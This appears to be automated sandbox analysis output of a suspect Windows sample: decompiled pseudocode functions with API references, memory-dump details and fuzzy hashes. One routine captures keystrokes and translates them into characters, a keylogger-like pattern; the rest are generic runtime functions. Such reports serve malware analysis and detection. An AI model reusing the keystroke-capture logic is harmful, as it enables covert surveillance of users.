                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				short _v6;
                                                                                                                                                                                                                            				char _v262;
                                                                                                                                                                                                                            				int _v268;
                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                            				struct HKL__* _t25;
                                                                                                                                                                                                                            				struct HKL__* _t28;
                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				unsigned int _t52;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v272 = 0;
                                                                                                                                                                                                                            				_v268 = 0;
                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                            				_push(_t68);
                                                                                                                                                                                                                            				_push(0x47699d);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t68 + 0xfffffef4;
                                                                                                                                                                                                                            				 *0x49ec4c = GetKeyboardLayout(0);
                                                                                                                                                                                                                            				GetKeyboardState( &_v262);
                                                                                                                                                                                                                            				_t25 =  *0x49ec4c; // 0x0
                                                                                                                                                                                                                            				_t28 =  *0x49ec4c; // 0x0
                                                                                                                                                                                                                            				_t65 =  *(_t45 + 4);
                                                                                                                                                                                                                            				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
                                                                                                                                                                                                                            				_t52 =  *(_t45 + 8);
                                                                                                                                                                                                                            				if((_t52 & 0x80000000) != 0) {
                                                                                                                                                                                                                            					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
                                                                                                                                                                                                                            						E00404BA8();
                                                                                                                                                                                                                            						E00476A9C(_t45, _v272,  *(_t45 + 4));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t30 <= 0) {
                                                                                                                                                                                                                            						 *0x49ec50 =  *(_t45 + 4);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404BA8();
                                                                                                                                                                                                                            						E00476A9C(_t45, _v268,  *(_t45 + 4));
                                                                                                                                                                                                                            						 *0x49ec50 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t56);
                                                                                                                                                                                                                            				 *[fs:eax] = _t56;
                                                                                                                                                                                                                            				_push(0x4769a4);
                                                                                                                                                                                                                            				return E004049E4( &_v272, 2);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32 ref: 004768CA
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                                                                                                                                                                                            • MapVirtualKeyExA.USER32 ref: 004768FF
                                                                                                                                                                                                                            • ToAsciiEx.USER32(?,00000000,?,00000002,00000000,?), ref: 00476906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Keyboard$AsciiLayoutStateVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 692081290-0
                                                                                                                                                                                                                            • Opcode ID: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                                                                                                                                                                                            • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				int _t41;
                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t50 = _t41;
                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                            				_t40 = __eax;
                                                                                                                                                                                                                            				if(E0044DEB4(__eax) == 0) {
                                                                                                                                                                                                                            					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                                                                                                                                                                                            					_t27 = GetMenuItemID(_t49, _t50);
                                                                                                                                                                                                                            					_t51 = _t27;
                                                                                                                                                                                                                            					if(_t27 != 0xffffffff) {
                                                                                                                                                                                                                            						_v8 = E0044DD30(_t40, 0, _t51);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t49 = GetSubMenu(_t49, _t50);
                                                                                                                                                                                                                            					_v8 = E0044DD30(_t40, 1, _t37);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *_a12 = 0;
                                                                                                                                                                                                                            					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                                                                                                                                                                                            					return E00409F88(_a12, _t49);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ItemStateString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 306270399-0
                                                                                                                                                                                                                            • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t40;
                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t42 = _t43;
                                                                                                                                                                                                                            				_t44 = _t43 + 0xfffffff8;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t42);
                                                                                                                                                                                                                            				_push(0x474cbf);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t44;
                                                                                                                                                                                                                            				_push(_t42);
                                                                                                                                                                                                                            				_push(0x474c8c);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t44;
                                                                                                                                                                                                                            				_t40 = LoadLibraryA(E00404E80(_v8));
                                                                                                                                                                                                                            				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
                                                                                                                                                                                                                            				if(_t19 != 0) {
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				FreeResource(_t19);
                                                                                                                                                                                                                            				FreeLibrary(_t40);
                                                                                                                                                                                                                            				_pop(_t35);
                                                                                                                                                                                                                            				 *[fs:eax] = _t35;
                                                                                                                                                                                                                            				_pop(_t36);
                                                                                                                                                                                                                            				 *[fs:eax] = _t36;
                                                                                                                                                                                                                            				_push(0x474cc6);
                                                                                                                                                                                                                            				return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C54
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C77
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 622515136-0
                                                                                                                                                                                                                            • Opcode ID: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                                                                                                                                                                                            • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00459634(void* __eax, void* __ecx, char __edx) {
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				struct HWND__* _v20;
                                                                                                                                                                                                                            				int _t17;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t37 = _t36 + 0xfffffff8;
                                                                                                                                                                                                                            				_t27 = __eax;
                                                                                                                                                                                                                            				_t17 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                                                                                                                                                                                                            						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                                                                                                                                                                                                            						_v12 = __edx;
                                                                                                                                                                                                                            						EnumWindows(E004595C4, _t37);
                                                                                                                                                                                                                            						_t5 = _t27 + 0x90; // 0x0
                                                                                                                                                                                                                            						_t17 =  *_t5;
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                                                                                                                                                                                                            							_t33 = GetWindow(_v20, 3);
                                                                                                                                                                                                                            							_v20 = _t33;
                                                                                                                                                                                                                            							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                                                                                                                                                                                                            								_v20 = 0xfffffffe;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t10 = _t27 + 0x90; // 0x0
                                                                                                                                                                                                                            							_t17 =  *_t10;
                                                                                                                                                                                                                            							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                                                                                                                                                                                                            							if(_t35 >= 0) {
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									_t13 = _t27 + 0x90; // 0x0
                                                                                                                                                                                                                            									_t17 = SetWindowPos(E0041AC6C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                                                                                                                                                                                                            									_t35 = _t35 - 1;
                                                                                                                                                                                                                            								} while (_t35 != 0xffffffff);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t17;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumWindows.USER32(004595C4), ref: 00459669
                                                                                                                                                                                                                            • GetWindow.USER32(00000003,00000003), ref: 00459681
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0045968E
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004596CD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$EnumLongWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4191631535-0
                                                                                                                                                                                                                            • Opcode ID: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                                                            • Instruction ID: e023c87b117193a46b59b10cd2d90065ddfa048c4e1cca94785ca85305bb7b15
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49117331609210AFD711EB28CC85F9673D4AB05765F18017AFDA8AF2D3C378AC49C75A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                                                                                                                                                                                            				CHAR* _v8;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				CHAR* _t24;
                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                            				struct HRSRC__* _t29;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t31;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = _t24;
                                                                                                                                                                                                                            				_t31 = __edx;
                                                                                                                                                                                                                            				_t23 = __eax;
                                                                                                                                                                                                                            				_t29 = FindResourceA(__edx, _v8, _a4);
                                                                                                                                                                                                                            				 *(_t23 + 0x10) = _t29;
                                                                                                                                                                                                                            				_t33 = _t29;
                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                            					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
                                                                                                                                                                                                                            					_pop(_t24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t5 = _t23 + 0x10; // 0x41e23c
                                                                                                                                                                                                                            				_t30 = LoadResource(_t31,  *_t5);
                                                                                                                                                                                                                            				 *(_t23 + 0x14) = _t30;
                                                                                                                                                                                                                            				_t34 = _t30;
                                                                                                                                                                                                                            				if(_t30 == 0) {
                                                                                                                                                                                                                            					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t7 = _t23 + 0x10; // 0x41e23c
                                                                                                                                                                                                                            				_push(SizeofResource(_t31,  *_t7));
                                                                                                                                                                                                                            				_t8 = _t23 + 0x14; // 0x41dd60
                                                                                                                                                                                                                            				_t18 = LockResource( *_t8);
                                                                                                                                                                                                                            				_pop(_t25);
                                                                                                                                                                                                                            				return E0041DD20(_t23, _t25, _t18);
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,?,?), ref: 0041E1AF
                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1C9
                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1E3
                                                                                                                                                                                                                            • LockResource.KERNEL32(0041DD60,00000000,?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1ED
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3473537107-0
                                                                                                                                                                                                                            • Opcode ID: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                                                                                                                                                                                            • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401618(void* __eax, void** __ecx, void* __edx) {
                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                            				void** _t9;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t9 = __ecx;
                                                                                                                                                                                                                            				_t14 = __edx;
                                                                                                                                                                                                                            				_t17 = __eax;
                                                                                                                                                                                                                            				 *(__ecx + 4) = 0x100000;
                                                                                                                                                                                                                            				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
                                                                                                                                                                                                                            				_t13 = _t4;
                                                                                                                                                                                                                            				 *_t9 = _t13;
                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                            					_t16 = _t14 + 0x0000ffff & 0xffff0000;
                                                                                                                                                                                                                            					_t9[1] = _t16;
                                                                                                                                                                                                                            					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
                                                                                                                                                                                                                            					 *_t9 = _t4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *_t9 != 0) {
                                                                                                                                                                                                                            					_t4 = E00401468(0x49e5ec, _t9);
                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                            						VirtualFree( *_t9, 0, 0x8000);
                                                                                                                                                                                                                            						 *_t9 = 0;
                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401636
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 0040165B
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401681
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 3668210933-1966777607
                                                                                                                                                                                                                            • Opcode ID: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                                                                                                                                                                                            • Instruction ID: d5b131199f8cf9b3caee1c5a15836c0652bc1ac5bd3422d56553b580ad17c722
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF044B17403206BEB315AAA4CC5F133AD89B45794F154176BE08BF3D9D6B99800866C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409AB8(WORD* __eax) {
                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                            				long _t20;
                                                                                                                                                                                                                            				WORD* _t30;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				struct _FILETIME* _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t36 = _t35 + 0xfffffff8;
                                                                                                                                                                                                                            				_t30 = __eax;
                                                                                                                                                                                                                            				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
                                                                                                                                                                                                                            					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t20 = GetLastError();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					return _t20;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
                                                                                                                                                                                                                            				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
                                                                                                                                                                                                                            				_t30[2] = _t30[0x1c];
                                                                                                                                                                                                                            				_t30[4] = _t30[0xc].dwFileAttributes;
                                                                                                                                                                                                                            				E00404C30( &(_t30[6]), 0x104,  &(_t30[0x22]));
                                                                                                                                                                                                                            				_t20 = 0;
                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00409AC8
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 00409AD1
                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                            • FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2103556486-0
                                                                                                                                                                                                                            • Opcode ID: a849e5e94c7fbfa8f8aea85ae301e7413f9f23e8f459ad811eccfcc8423f03f6
                                                                                                                                                                                                                            • Instruction ID: 4a410686d79e47fa2b0968ed75fbe7b0933b14da80f461b342b6a519e83f05d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a849e5e94c7fbfa8f8aea85ae301e7413f9f23e8f459ad811eccfcc8423f03f6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFF01DB26042019BCF04DFA9D8C288733ACAB4831431445B7AD16DF28BE638E9549BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00438CE0(struct HWND__* __eax, void* __ecx) {
                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                            				struct HWND__* _t19;
